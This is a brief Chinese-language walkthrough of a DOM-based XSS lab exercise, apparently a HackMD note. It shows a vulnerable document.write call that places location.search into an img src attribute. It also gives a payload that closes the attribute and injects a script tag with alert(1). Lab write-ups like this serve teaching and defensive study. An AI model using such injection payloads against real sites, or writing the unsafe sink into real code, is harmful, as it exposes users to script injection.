# Cross-site scripting Lab3 這題為 DOM-based XSS,一樣先進入網站。  在輸入框隨便輸入個東西。  查看原始碼。  這代表輸入是放進 img 的 src 屬性裡,像這樣: ```javascript document.write('<img src="' + location.search + '">'); ``` 所以我們嘗試跳脫 `src="..."` 的雙引號,並插入自己的 XSS 。 ``` "><script>alert(1)</script> ```   ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up